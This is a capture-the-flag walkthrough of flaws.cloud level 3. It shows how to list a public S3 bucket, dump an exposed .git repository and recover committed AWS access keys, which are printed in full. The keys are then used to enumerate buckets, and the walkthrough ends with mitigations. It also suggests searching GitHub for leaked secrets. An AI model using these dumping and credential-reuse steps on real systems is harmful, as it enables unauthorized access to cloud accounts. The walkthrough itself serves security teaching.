flaws.cloud - Level 3


A long time ago I started flAWS.cloud, a CTF-style cloud security game that teaches cloud-specific vulnerabilities caused by bad configurations. I have now picked it up again, and here is a walkthrough of level 3. Like before, we have a public homepage hosted on S3. This time we find a git repository with IAM credentials in the commit history. Using them, we can list the buckets and find the link to the next level.

The previous level 2 illustrated how an ACL misconfiguration can accidentally open up S3 buckets to all AWS users anywhere in the world. That was enough to get the secret we needed. This time it will not be so easy. Again, the starting point is a public website and we can again list the bucket, but now the secret is hidden.

EDIT 11th Nov 2019: changed the description of this level. I mistakenly assumed you would need an IAM user with access to S3 but you do not. Everything can be done without authentication. This means you do not need your own AWS account for this level.

Level 3

The description of this level says it is fairly similar to the previous one. Thus, we simply try again to list the bucket, this time with an unsigned request, and see what we get. The following call will do the trick:

 $ aws s3api list-objects-v2 --bucket level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --no-sign-request --region us-west-2
{
    "Contents": [
        {
            "Key": ".git/COMMIT_EDITMSG",
            "LastModified": "2017-09-17T15:12:24.000Z",
            "ETag": "\"5f8f2cb9c2664a23f08dd8a070ae7427\"",
            "Size": 52,
            "StorageClass": "STANDARD"
        },
        {
            "Key": ".git/HEAD",
            "LastModified": "2017-09-17T15:12:24.000Z",
            "ETag": "\"4cf2d64e44205fe628ddd534e1151b58\"",
            "Size": 23,
            "StorageClass": "STANDARD"
        },
        ...
        {
            "Key": "index.html",
            "LastModified": "2017-02-27T02:05:16.000Z",
            "ETag": "\"b2d525a43d0d0f84bcc4a8d2cf092170\"",
            "Size": 1703,
            "StorageClass": "STANDARD"
        },
        {
            "Key": "robots.txt",
            "LastModified": "2017-02-27T00:14:33.000Z",
            "ETag": "\"bbbcde0b15cabd06aace1df82d335978\"",
            "Size": 26,
            "StorageClass": "STANDARD"
        }
    ]
}

Great, it works on this bucket too. We find the usual index.html containing this level's homepage, a robots.txt file, and a lot of other files. Some of them have keys starting with .git, which suggests they belong to a git repository. It looks as if the creator of the homepage deployed not just the homepage itself but also the git repository used to develop it.

To explore the repository further, we have to download all the files. A quick way to do that is to use the sync command of the AWS CLI tool. The following command will download the entire bucket to your current local directory:

 $ aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud . --no-sign-request --region us-west-2
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/HEAD to .git/HEAD
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/commit-msg.sample to .git/hooks/commit-msg.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/COMMIT_EDITMSG to .git/COMMIT_EDITMSG
...

The git repository is now available and you can work with it just like any developer would. First start by inspecting the files you can see:

 $ ls -la
total 160
drwxr-xr-x 3 root root   4096 Oct 24 13:48 .
drwxrwxrwt 1 root root   4096 Oct 24 13:47 ..
drwxr-xr-x 6 root root   4096 Oct 24 13:48 .git
-rw-r--r-- 1 root root 123637 Oct 24 13:48 authenticated_users.png
-rw-r--r-- 1 root root   1552 Oct 24 13:48 hint1.html
-rw-r--r-- 1 root root   1426 Oct 24 13:48 hint2.html
-rw-r--r-- 1 root root   1247 Oct 24 13:48 hint3.html
-rw-r--r-- 1 root root   1035 Oct 24 13:48 hint4.html
-rw-r--r-- 1 root root   1703 Oct 24 13:48 index.html
-rw-r--r-- 1 root root     26 Oct 24 13:48 robots.txt

Not much to see apart from the main homepage and a few hints (that we do not look at, of course). But what did this homepage look like in the past? We can find out by exploring the development history with git. Use the git command line tool to see the history of the latest commits:

 $ git log
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 <[email protected]>
Date:   Sun Sep 17 09:10:43 2017 -0600

    Oops, accidentally added something I shouldn't have

commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 <[email protected]>
Date:   Sun Sep 17 09:10:07 2017 -0600

    first commit

This is a very short history of only two commits, which makes it easy to spot the very interesting message of the second one. It sounds like there is something the creator of the homepage does not want others to see. We can compare this commit to the previous one to find out what that is:

 $ git diff f52ec03b227ea6094b04e43f475fb0126edb5a61 b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
index e3ae6dd..0000000
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAJ367LIFB4IJST7QA
-secret_access_key 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

Oops, looks like the creator accidentally committed AWS credentials to the repository. The mistake was spotted a few seconds later and quickly "fixed" by adding a commit that removes them. Unfortunately, git does not forget: nothing is ever deleted. What might happen if we replace our dummy credentials with these and try some requests? First, set the credentials:

 $ export AWS_ACCESS_KEY_ID=AKIAJ367LIFB4IJST7QA
 $ export AWS_SECRET_ACCESS_KEY=OdNa7m+bqUvF3Bn/qgSnPE1eBpqcBWTjqwV83Lys
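As a sanity check (not part of the original walkthrough), you can first ask AWS which principal these credentials belong to; sts get-caller-identity works with any valid credentials and needs no extra permissions:

```shell
# Ask AWS which account and IAM user the current credentials authenticate as
aws sts get-caller-identity
```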

The level description mentions we may be able to list other buckets, so let's do that first:

 $ aws s3api list-buckets
{
    "Buckets": [
        {
            "Name": "2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud",
            "CreationDate": "2017-02-18T19:41:52.000Z"
        },
        {
            "Name": "config-bucket-975426262029",
            "CreationDate": "2017-05-29T16:34:53.000Z"
        },
        {
            "Name": "flaws-logs",
            "CreationDate": "2018-07-07T16:09:49.000Z"
        },
        {
            "Name": "flaws.cloud",
            "CreationDate": "2017-02-18T19:40:54.000Z"
        },
        {
            "Name": "level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud",
            "CreationDate": "2017-02-24T05:15:42.000Z"
        },
        {
            "Name": "level3-9afd3927f195e10225021a578e6f78df.flaws.cloud",
            "CreationDate": "2017-02-26T18:29:03.000Z"
        },
        {
            "Name": "level4-1156739cfb264ced6de514971a4bef68.flaws.cloud",
            "CreationDate": "2017-02-26T18:49:31.000Z"
        },
        {
            "Name": "level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud",
            "CreationDate": "2017-02-26T19:49:03.000Z"
        },
        {
            "Name": "level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud",
            "CreationDate": "2017-02-26T19:48:40.000Z"
        },
        {
            "Name": "theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud",
            "CreationDate": "2017-02-26T20:07:13.000Z"
        }
    ],
    "Owner": {
        "DisplayName": "0xdabbad00",
        "ID": "d70419f1cb589d826b5c2b8492082d193bca52b1e6a81082c36c993f367a5d73"
    }
}

Great! We can now see the buckets for all levels 1 to 6 and can move on by checking out the website for the 4th level. Clever people may think they can now jump to levels 5 and 6 directly, but those pages tell you not to cheat; the actual content is hosted in a subdirectory you cannot see yet.

The flaw

In this level, we gained an initial foothold in the account under attack. We found credentials for one of the IAM users and can now perform all actions that user is authorized to perform.

Multiple issues led to this. Like in the previous level, a configuration mistake allowed us to list the bucket without any special access rights. The next issue is that the creator of the homepage pushed the git repository into the bucket hosting the page. Combined with careless handling of AWS credentials, this handed attackers valid credentials. What could have been done to mitigate the danger of that happening?

Prevent bucket listing

By accidentally leaving the bucket open to everyone, the owner enabled us to list it and discover the git repository. Clearly this misconfiguration is bad and should be avoided. In this case, however, we do not strictly need that access. Since the website must be publicly available, it is always possible to request content via HTTP, and S3 will serve all content in the bucket that way, including the git repository. Thus, it is easy to test whether a git repository sits on a web server. In our case, the following curl command reveals that there is one:

 $ curl http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/HEAD
ref: refs/heads/master

".git/HEAD" is a file that every git repository has, so you can always just request it; if you get a response, you know there is a repository. There are several other standard files you could download (for a short introduction to the file structure, refer to this blog post). The majority of the content, however, is stored under ".git/objects", where file names are SHA-1 hashes of the objects stored in the repository (more on objects here). Their locations are not easily predictable.
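To illustrate why: object paths are derived from the content itself. A blob is stored under the SHA-1 of a small header plus the raw bytes, so you can only compute the path if you already know the exact content. A quick sketch with sha1sum, using the well-known hash of the 6-byte content "hello\n":

```shell
# Git stores a blob at .git/objects/<first 2 hex chars>/<remaining 38 chars>,
# where the hash is SHA-1 over the header "blob <size>\0" plus the content.
printf 'blob 6\0hello\n' | sha1sum
# ce013625030ba8dba906f756967f9e9ca394464a  -
# -> stored as .git/objects/ce/013625030ba8dba906f756967f9e9ca394464a
```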

Under certain circumstances it can be possible to dump a git repository even if the web server does not allow listing files. GitTools provides a script for this purpose; in our example we can use it to fetch the repository:

 $ ./gitdumper.sh http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/ /tmp/repo
...
[*] Destination folder does not exist
[+] Creating /tmp/repo/.git/
[+] Downloaded: HEAD
...
[+] Downloaded: objects/c2/aab7e03933a858d1765090928dca4013fe2526
...

Note that this does not require any IAM credentials at all. Now we can use the result as before to explore the git history and find the keys.

 $ git diff b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 f52ec03b227ea6094b04e43f475fb0126edb5a61
diff --git a/access_keys.txt b/access_keys.txt
new file mode 100644
index 0000000..e3ae6dd
--- /dev/null
+++ b/access_keys.txt
@@ -0,0 +1,2 @@
+access_key AKIAJ367LIFB4IJST7QA
+secret_access_key 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

A word of caution: be careful with git repositories you download from untrusted sources. Always check the ".git/hooks" folder. It contains hooks: shell scripts that git runs automatically on certain commands such as commit, push, or pull. If you carelessly run git commands on such a repository, you may trigger a malicious script. A normal git clone does not transfer hooks, but if you download all files from a website, you will get them. Not long ago, Git hooks caused some trouble.
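A quick way to spot live hooks is shown below. This is a self-contained sketch: it fakes a downloaded repository with one planted hook, then lists everything git would actually execute (git ships only inert *.sample hooks by default, so any other file in that folder deserves scrutiny):

```shell
# Fake a downloaded repo containing one live hook and one inert sample
mkdir -p demo/.git/hooks
printf '#!/bin/sh\necho malicious\n' > demo/.git/hooks/post-checkout
touch demo/.git/hooks/pre-commit.sample

# List hook files git would actually execute (*.sample files are ignored)
find demo/.git/hooks -type f ! -name '*.sample'
# demo/.git/hooks/post-checkout
```

With Git 2.9 or later you can also disable hooks for a single command by overriding their location, e.g. `git -c core.hooksPath=/dev/null log`.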

Keep secrets out of version control

If no secrets had been committed to the git repository, we would not have gained access to the account. Obviously, you should never commit them, and if you do, you must consider the secret revealed and rotate the credentials. Deleting a secret from master does not delete it from the history of the version control system.
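To see why deletion does not help, here is a sketch that reconstructs the scenario in a scratch repository (file name borrowed from this level; the identity settings are placeholders) and then recovers the "deleted" file with a single command:

```shell
# Reconstruct the scenario: commit a secret, then "fix" it with a removal commit
cd "$(mktemp -d)"
git init -q .
echo 'access_key EXAMPLE' > access_keys.txt
git add access_keys.txt
git -c user.name=dev -c user.email=dev@example.com commit -qm 'first commit'
git rm -q access_keys.txt
git -c user.name=dev -c user.email=dev@example.com commit -qm 'remove secret'

# The parent of the removal commit still serves the file on request
git show HEAD~1:access_keys.txt
# access_key EXAMPLE

# List all files that were ever deleted anywhere in the history
git log --all --diff-filter=D --name-only --pretty=format:
```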

Besides educating your team and checking for such problems in code reviews, you can run automated scanners to find secrets. This is handy both for defenders (e.g., as part of CI) and for attackers (because real repositories are huge and manual searching takes time). For example, you could use truffleHog. To test-drive it, install it with pip install truffleHog, then run it on the repository we dumped in this level and it finds the key for you:

 $ truffleHog --regex --entropy=false /tmp/repo/
~~~~~~~~~~~~~~~~~~~~~
Reason: AWS API Key
Date: 2017-09-17 15:10:43
Hash: b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
Filepath: access_keys.txt
Branch: origin/master
Commit: Oops, accidentally added something I shouldn't have

AKIAJ367LIFB4IJST7QA
~~~~~~~~~~~~~~~~~~~~~
...

Fun fact: this problem happens a lot even in public GitHub repositories. Try search queries like “DELETE ENV”, which are characteristic of commit messages describing the “fix”. Or check out GitHub dorks repositories like this one; they contain scripts for scanning GitHub.

Don’t deploy Git repositories

The most obvious fix is simply not to deploy the Git repository. It is not needed to serve the website and should never have made it into the bucket in the first place. A scan of the Alexa Top 1M conducted in 2015 (see here, German only) found roughly 10k websites (about 1%) where this mistake was made. So while not frequent, it clearly happens in practice.

To be on the safe side, you can block access to a git repository just in case one does get copied to an S3 bucket. For example, in the bucket policy shown below, the first statement grants public read access to the entire bucket, which is required for public website access (AWS docs). The second statement then overrides the first and denies access to the ".git" folder. Remember that an explicit Deny trumps an Allow and is evaluated first.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid":"PublicRead",
      "Effect":"Allow",
      "Principal": "*",
      "Action":["s3:GetObject"],
      "Resource":["arn:aws:s3:::your-bucket/*"]
    },
    {
      "Sid": "DenyGit",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::your-bucket/.git/*"
    }
  ]
}
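For completeness, a sketch of how such a policy could be attached with the AWS CLI. The bucket name and file name are placeholders, and the website endpoint assumes region us-west-2:

```shell
# Attach the policy above (saved as policy.json) to the bucket
aws s3api put-bucket-policy --bucket your-bucket --policy file://policy.json

# Afterwards, requests for anything under .git/ should be denied (HTTP 403)
curl -s -o /dev/null -w '%{http_code}\n' http://your-bucket.s3-website-us-west-2.amazonaws.com/.git/HEAD
```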

Conclusion

This level demonstrated that it is dangerous to commit secrets to Git repositories as well as to make those repositories available on a website. None of this is specific to the cloud or to AWS in particular. Still, it is important to know how to configure S3 buckets correctly to avoid it. The key takeaways are:

  • never commit IAM credentials to Git repositories
  • never deploy Git repositories on your website
  • configure your web server - S3 in this example - to not allow listing and to block access to .git, just in case a repository with a secret gets deployed